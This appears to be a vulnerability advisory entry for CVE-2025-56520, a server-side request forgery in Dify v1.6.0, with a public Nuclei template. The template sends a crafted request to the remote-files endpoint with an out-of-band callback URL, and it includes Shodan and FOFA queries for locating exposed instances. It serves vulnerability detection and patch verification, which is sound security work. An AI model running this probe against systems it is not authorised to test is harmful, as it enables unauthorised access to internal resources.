漏洞描述
Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.
CVE-2025-56520: Dify v1.6.0 - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2025-56520
info:
name: Dify v1.6.0 - Server-Side Request Forgery
author: 0x_Akoko
severity: high
description: |
Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.
impact: |
Attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data.
remediation: |
Update to the latest version.
reference:
- https://github.com/langgenius/dify
- https://dify.ai/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2025-56520
epss-score: 0.00512
epss-percentile: 0.6588
cwe-id: CWE-918
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Dify"
fofa-query: title="Dify"
tags: cve,cve2025,dify,ssrf,oast,oob,oss
http:
- raw:
- |
GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "file_type"
- "file_length"
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
condition: or
- type: status
status:
- 200
# digest: 4b0a004830460221008512f1d6c7594790c6471a887451a43e8d0cafe1be95e208e756060a0fb24219022100c6681b7bf62e6c3f577561041ad14b6d8f652837143b286684deead77be42d71:922c64590222798bb761d5b6d8e72950